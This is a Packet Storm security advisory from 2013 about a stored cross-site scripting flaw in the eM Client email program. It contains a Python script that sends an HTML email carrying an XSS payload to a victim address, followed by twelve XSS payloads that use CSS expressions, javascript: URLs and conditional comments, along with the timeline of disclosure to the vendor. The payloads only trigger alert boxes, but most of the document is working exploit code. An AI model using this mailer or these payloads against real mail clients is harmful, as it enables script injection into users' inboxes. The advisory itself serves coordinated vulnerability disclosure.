eM Client 5.0.18025.0 Cross Site Scripting

2013-09-10T00:00:00
ID PACKETSTORM:123173
Type packetstorm
Reporter loneferret
Modified 2013-09-10T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
'''  
  
Author: loneferret of Offensive Security  
Date: 22-08-2013  
Product: eM Client for Windows  
Version: 5.0.18025.0 (previous versions and other platforms may be vulnerable)  
Vendor Site: http://www.emclient.com/  
Software Download: http://www.emclient.com/download  
  
Tested on: Windows XP Pro SP3 Eng.  
Tested on: Windows 7 Pro SP1 Eng.  
eM Client: Using default settings  
  
  
E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you  
get an annoying alert box etc etc etc.  
Injection Point: Body  
  
Gave vendor 7 days to reply in order to co-ordinate a release date.  
Timeline:  
23 Aug 2013: Tentative release date 30 Aug 2013  
23 Aug 2013: Vulnerability reported to vendor. Provided a list of payloads  
26 Aug 2013: No response from vendor, sent a reminder email  
27 Aug 2013: Vendor responded, will issue update to fix within 14 days  
27 Aug 2013: Tentative release date pushed to September 10th 2013  
27 Aug 2013: Replied to vendor with new date  
09 Sep 2013: Contacted vendor with remainder of release date  
09 Sep 2013: Vendor responded with go ahead with release  
10 Sep 2013: Public release  
  
'''  
  
import smtplib, urllib2  
  
payload = '''<DIV STYLE="background-image: url(javascript:alert('XSS'))">'''  
  
def sendMail(dstemail, frmemail, smtpsrv, username, password):  
msg = "From: hacker@offsec.local\n"  
msg += "To: victim@offsec.local\n"  
msg += 'Date: Today\r\n'  
msg += "Subject: XSS payload\n"  
msg += "Content-type: text/html\n\n"  
msg += payload + "\r\n\r\n"  
server = smtplib.SMTP(smtpsrv)  
server.login(username,password)  
try:  
server.sendmail(frmemail, dstemail, msg)  
except Exception, e:  
print "[-] Failed to send email:"  
print "[*] " + str(e)  
server.quit()  
  
username = "test@test.com"  
password = "123456"  
dstemail = "test@test.com"  
frmemail = "hacker@offsec.local"  
smtpsrv = "172.16.61.165"  
  
print "[*] Sending Email"  
sendMail(dstemail, frmemail, smtpsrv, username, password)  
  
'''  
# Payloads  
[+] Payload 1 : DIV background-image 1  
[+] Code for 1 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
------------  
[+] Payload 2 : DIV background-image 2  
[+] Code for 2 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
------------  
[+] Payload 3 : DIV expression  
[+] Code for 3 : <DIV STYLE="width: expression(alert('XSS'));">  
------------  
[+] Payload 4 : IMG STYLE w/expression  
[+] Code for 4 : exp/*<XSS STYLE='no\xss:noxss("*//*");  
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>  
------------  
[+] Payload 5 : List-style-image  
[+] Code for 5 : <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS  
------------  
[+] Payload 6 : STYLE w/Comment  
[+] Code for 6 : <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">  
------------  
[+] Payload 7 : STYLE w/Anonymous HTML  
[+] Code for 7 : <XSS STYLE="xss:expression(alert('XSS'))">  
------------  
[+] Payload 8 : STYLE w/background-image  
[+] Code for 8 : <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>  
------------  
[+] Payload 9 : TABLE  
[+] Code for 9 : <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>  
------------  
[+] Payload 10 : TD  
[+] Code for 11 : <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>  
------------  
[+] Payload 12 : Commented-out Block  
[+] Code for 12 : <!--[if gte IE 4]>  
<SCRIPT>alert('XSS');</SCRIPT>  
<![endif]-->  
----  
'''  
  
`